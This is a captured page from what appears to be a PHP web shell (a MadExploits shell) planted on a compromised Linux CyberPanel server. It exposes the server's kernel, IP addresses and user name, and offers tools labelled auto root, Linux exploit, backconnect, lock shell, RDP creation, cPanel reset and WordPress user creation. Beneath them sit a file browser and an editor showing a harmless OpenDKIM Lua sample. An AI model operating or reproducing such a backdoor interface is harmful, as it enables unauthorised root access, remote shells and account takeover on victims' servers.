Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opendkim /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
example.com.ldif
7.91
KB
-rw-r--r--
final.lua.sample
2.04
KB
-rw-r--r--
opendkim.conf.sample
21.49
KB
-rw-r--r--
opendkim.conf.simple
708
B
-rw-r--r--
opendkim.conf.simple-verify
433
B
-rw-r--r--
screen.lua.sample
984
B
-rw-r--r--
setup.lua.sample
2.17
KB
-rw-r--r--
stats.lua
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : screen.lua.sample
-- -- Copyright (c) 2009, 2010, 2012, The Trusted Domain Project. -- All rights reserved. -- -- screen.lua.sample -- sample version of the "screen" script that demonstrates -- all of the features of the configuration file -- -- The screen script is executed after all header fields have been received -- and after signatures have been selected, but before the message body -- is handled. Here we have an opportunity to identify and ignore signatures -- we know we don't trust. -- retrieve the count of signatures on the message nsigs = odkim.get_sigcount(ctx) if nsigs == nil then return nil end -- get the From: domain fdomain = odkim.get_fromdomain(ctx) if fdomain == nil then return nil end -- for each signature, ignore it if it's not from the sender's domain for n = 1, nsigs do sig = odkim.get_signhandle(ctx, n) sdomain = odkim.sig_getdomain(sig) if fdomain ~= sdomain then odkim.sig_ignore(sig) end end -- That's it! return nil
Close